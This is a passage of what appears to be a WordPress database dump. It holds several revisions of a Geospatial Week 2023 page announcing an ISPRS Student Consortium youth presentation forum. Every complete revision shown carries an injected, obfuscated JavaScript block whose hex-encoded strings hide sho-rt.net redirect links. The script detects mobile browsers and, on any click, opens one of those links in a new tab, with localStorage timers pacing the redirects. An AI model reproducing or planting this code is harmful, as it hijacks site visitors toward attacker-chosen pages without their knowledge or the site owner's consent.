_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:44:38','2023-01-22 04:44:38','',3613,'https://gsw2023.com/?p=3619',0,'revision','',0),
(3620,1,'2023-01-22 04:50:47','2023-01-22 04:50:47','','youthm3','','inherit','open','closed','','youthm3','','','2023-01-22 04:50:47','2023-01-22 04:50:47','',3613,'https://gsw2023.com/wp-content/uploads/2023/01/youthm3.jpg',0,'attachment','image/jpeg',0),
(3621,1,'2023-01-22 04:51:27','2023-01-22 04:51:27','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:51:27','2023-01-22 04:51:27','',3613,'https://gsw2023.com/?p=3621',0,'revision','',0),
(3622,1,'2023-01-22 04:51:52','2023-01-22 04:51:52','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:51:52','2023-01-22 04:51:52','',3613,'https://gsw2023.com/?p=3622',0,'revision','',0),
(3623,1,'2023-01-22 04:52:37','2023-01-22 04:52:37','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1>Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 